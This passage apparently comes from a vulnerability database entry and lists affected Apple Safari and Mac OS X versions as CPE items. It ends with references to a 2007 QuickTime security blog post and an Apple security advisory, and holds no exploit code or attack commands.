- Apple>>Safari >> Version 3.2.1 (Open CPE detail)
- Apple>>Safari >> Version 3.2.1b (Open CPE detail)
- Apple>>Safari >> Version 3.2.2 (Open CPE detail)
- Apple>>Safari >> Version 3.2.2b (Open CPE detail)
- Apple>>Safari >> Version 4.0 (Open CPE detail)
- Apple>>Safari >> Version 4.0 (Open CPE detail)
- Apple>>Safari >> Version 4.0.0b (Open CPE detail)
- Apple>>Safari >> Version 4.0.1 (Open CPE detail)
- Apple>>Safari >> Version 4.0.2 (Open CPE detail)
- Apple>>Safari >> Version 4.0.3 (Open CPE detail)
- Apple>>Safari >> Version 4.0.4 (Open CPE detail)
- Apple>>Safari >> Version 4.0.5 (Open CPE detail)
- Apple>>Safari >> Version 4.1 (Open CPE detail)
- Apple>>Safari >> Version 4.1.1 (Open CPE detail)
- Apple>>Safari >> Version 4.1.2 (Open CPE detail)
- Apple>>Safari >> Version 4.1.3 (Open CPE detail)
- Apple>>Safari >> Version 5.0 (Open CPE detail)
- Apple>>Safari >> Version 5.0.1 (Open CPE detail)
- Apple>>Safari >> Version 5.0.2 (Open CPE detail)
- Apple>>Safari >> Version 5.0.3 (Open CPE detail)
- Apple>>Safari >> Version 5.0.4 (Open CPE detail)
- Apple>>Safari >> Version 5.0.5 (Open CPE detail)
- Apple>>Safari >> Version 5.0.6 (Open CPE detail)
- Apple>>Safari >> Version 5.1 (Open CPE detail)
- Apple>>Safari >> Version 5.1.1 (Open CPE detail)
- Apple>>Safari >> Version 5.1.2 (Open CPE detail)
- Apple>>Safari >> Version 5.1.3 (Open CPE detail)
- Apple>>Safari >> Version 5.1.4 (Open CPE detail)
- Apple>>Safari >> Version 5.1.5 (Open CPE detail)
- Apple>>Safari >> Version 5.1.6 (Open CPE detail)
- Apple>>Safari >> Version 5.1.7 (Open CPE detail)
- Apple>>Safari >> Version 6.0 (Open CPE detail)
- Apple>>Safari >> Version 6.0.1 (Open CPE detail)
- Apple>>Safari >> Version 6.0.2 (Open CPE detail)
- Apple>>Safari >> Version 6.0.3 (Open CPE detail)
- Apple>>Safari >> Version 6.0.4 (Open CPE detail)
- Apple>>Safari >> Version 6.0.5 (Open CPE detail)
- Apple>>Safari >> Version 6.1 (Open CPE detail)
- Apple>>Safari >> Version 6.1.1 (Open CPE detail)
- Apple>>Safari >> Version 6.1.2 (Open CPE detail)
- Apple>>Safari >> Version 6.1.3 (Open CPE detail)
- Apple>>Safari >> Version 6.1.4 (Open CPE detail)
- Apple>>Safari >> Version 6.1.5 (Open CPE detail)
- Apple>>Safari >> Version 6.2.1 (Open CPE detail)
- Apple>>Safari >> Version 6.2.4 (Open CPE detail)
- Apple>>Safari >> Version 6.2.5 (Open CPE detail)
- Apple>>Safari >> Version 6.2.6 (Open CPE detail)
- Apple>>Safari >> Version 6.2.8 (Open CPE detail)
- Apple>>Safari >> Version 7.0 (Open CPE detail)
- Apple>>Safari >> Version 7.0.1 (Open CPE detail)
- Apple>>Safari >> Version 7.0.2 (Open CPE detail)
- Apple>>Safari >> Version 7.0.3 (Open CPE detail)
- Apple>>Safari >> Version 7.0.4 (Open CPE detail)
- Apple>>Safari >> Version 7.0.5 (Open CPE detail)
- Apple>>Safari >> Version 7.1 (Open CPE detail)
- Apple>>Safari >> Version 7.1.1 (Open CPE detail)
- Apple>>Safari >> Version 7.1.4 (Open CPE detail)
- Apple>>Safari >> Version 7.1.5 (Open CPE detail)
- Apple>>Safari >> Version 7.1.6 (Open CPE detail)
- Apple>>Safari >> Version 7.1.8 (Open CPE detail)
- Apple>>Safari >> Version 8.0 (Open CPE detail)
- Apple>>Safari >> Version 8.0.1 (Open CPE detail)
- Apple>>Safari >> Version 8.0.4 (Open CPE detail)
- Apple>>Safari >> Version 8.0.5 (Open CPE detail)
- Apple>>Safari >> Version 8.0.6 (Open CPE detail)
- Apple>>Safari >> Version 8.0.8 (Open CPE detail)
- Apple>>Safari >> Version 9.0.1 (Open CPE detail)
- Apple>>Safari >> Version 9.0.2 (Open CPE detail)
- Apple>>Safari >> Version 9.0.3 (Open CPE detail)
- Apple>>Safari >> Version 9.1 (Open CPE detail)
- Apple>>Safari >> Version 9.1.1 (Open CPE detail)
- Apple>>Safari >> Version 9.1.3 (Open CPE detail)
- Apple>>Safari >> Version 10.0.0 (Open CPE detail)
- Apple>>Safari >> Version 10.0.1 (Open CPE detail)
- Apple>>Safari >> Version 10.0.2 (Open CPE detail)
- Apple>>Safari >> Version 10.0.3 (Open CPE detail)
- Apple>>Safari >> Version 10.1 (Open CPE detail)
- Apple>>Safari >> Version 10.1.1 (Open CPE detail)
- Apple>>Safari >> Version 10.1.2 (Open CPE detail)
- Apple>>Safari >> Version 11.0 (Open CPE detail)
- Apple>>Safari >> Version 11.0.1 (Open CPE detail)
- Apple>>Safari >> Version 11.0.2 (Open CPE detail)
- Apple>>Safari >> Version 11.0.3 (Open CPE detail)
- Apple>>Safari >> Version 11.1 (Open CPE detail)
- Apple>>Safari >> Version 11.1.1 (Open CPE detail)
- Apple>>Safari >> Version 11.1.2 (Open CPE detail)
- Apple>>Safari >> Version 12 (Open CPE detail)
- Apple>>Safari >> Version 12.0 (Open CPE detail)
- Apple>>Safari >> Version 12.0.1 (Open CPE detail)
- Apple>>Safari >> Version 12.0.2 (Open CPE detail)
- Apple>>Safari >> Version 12.0.3 (Open CPE detail)
- Apple>>Safari >> Version 12.1 (Open CPE detail)
- Apple>>Safari >> Version 12.1.1 (Open CPE detail)
- Apple>>Safari >> Version 12.1.2 (Open CPE detail)
- Apple>>Safari >> Version 13 (Open CPE detail)
- Apple>>Safari >> Version 13.0.1 (Open CPE detail)
- Apple>>Safari >> Version 13.0.3 (Open CPE detail)
- Apple>>Safari >> Version 13.0.4 (Open CPE detail)
- Apple>>Safari >> Version 13.0.5 (Open CPE detail)
- Apple>>Safari >> Version 13.1 (Open CPE detail)
- Apple>>Safari >> Version 13.1.1 (Open CPE detail)
- Apple>>Safari >> Version 13.1.2 (Open CPE detail)
- Apple>>Safari >> Version 14.0 (Open CPE detail)
- Apple>>Safari >> Version 14.0.1 (Open CPE detail)
- Apple>>Safari >> Version 14.0.2 (Open CPE detail)
- Apple>>Safari >> Version 14.0.3 (Open CPE detail)
- Apple>>Safari >> Version 14.1 (Open CPE detail)
- Apple>>Safari >> Version 14.1.1 (Open CPE detail)
- Apple>>Safari >> Version 14.1.2 (Open CPE detail)
- Apple>>Safari >> Version 15.0.0 (Open CPE detail)
- Apple>>Safari >> Version 15.3 (Open CPE detail)
- Apple>>Safari >> Version 15.4 (Open CPE detail)
- Apple>>Safari >> Version 15.6 (Open CPE detail)
- Apple>>Safari >> Version 15.6.1 (Open CPE detail)
- Apple>>Safari >> Version 16.0 (Open CPE detail)
- Apple>>Safari >> Version 16.1 (Open CPE detail)
- Apple>>Safari >> Version 16.2 (Open CPE detail)
- Apple>>Safari >> Version 16.3 (Open CPE detail)
- Apple>>Safari >> Version 16.4 (Open CPE detail)
- Apple>>Safari >> Version 16.4.1 (Open CPE detail)
- Apple>>Safari >> Version 16.5 (Open CPE detail)
- Apple>>Safari >> Version 16.5.1 (Open CPE detail)
- Apple>>Safari >> Version 16.5.2 (Open CPE detail)
- Apple>>Safari >> Version 16.6 (Open CPE detail)
- Apple>>Safari >> Version 16.6.1 (Open CPE detail)
- Apple>>Safari >> Version 17.0 (Open CPE detail)
- Apple>>Safari >> Version 17.1 (Open CPE detail)
- Apple>>Safari >> Version 17.1.2 (Open CPE detail)
- Apple>>Safari >> Version 17.2 (Open CPE detail)
- Apple>>Safari >> Version 17.3 (Open CPE detail)
- Apple>>Safari >> Version 17.4 (Open CPE detail)
- Apple>>Safari >> Version 17.4.1 (Open CPE detail)
- Apple>>Safari >> Version 17.5 (Open CPE detail)
- Apple>>Safari >> Version 17.6 (Open CPE detail)
- Apple>>Safari >> Version 18 (Open CPE detail)
- Apple>>Safari >> Version 18.0 (Open CPE detail)
- Apple>>Safari >> Version 18.1 (Open CPE detail)
- Apple>>Safari >> Version 18.1.1 (Open CPE detail)
- Apple>>Safari >> Version 18.2 (Open CPE detail)
- Apple>>Safari >> Version 18.3 (Open CPE detail)
- Apple>>Safari >> Version 18.4 (Open CPE detail)
- Apple>>Safari >> Version 22 (Open CPE detail)
- Apple>>Safari >> Version 46 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.3.9
- Apple>>Mac_os_x >> Version 10.3.9 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.4.9
- Apple>>Mac_os_x >> Version 10.4.9 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.5
- Apple>>Mac_os_x >> Version 10.5 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.5.0
- Apple>>Mac_os_x >> Version 10.5.0 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.5.1
- Apple>>Mac_os_x >> Version 10.5.1 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.5.2
- Apple>>Mac_os_x >> Version 10.5.2 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.5.3
- Apple>>Mac_os_x >> Version 10.5.3 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.5.4
- Apple>>Mac_os_x >> Version 10.5.4 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.5.5
- Apple>>Mac_os_x >> Version 10.5.5 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.5.6
- Apple>>Mac_os_x >> Version 10.5.6 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.5.7
- Apple>>Mac_os_x >> Version 10.5.7 (Open CPE detail)
Apple>>Mac_os_x >> Version 10.5.8
- Apple>>Mac_os_x >> Version 10.5.8 (Open CPE detail)
References
http://www.beskerming.com/security/2007/11/25/74/QuickTime_-_Remote_hacker_automatic_control
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://lists.apple.com/archives/Security-announce/2007/Dec/msg00000.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
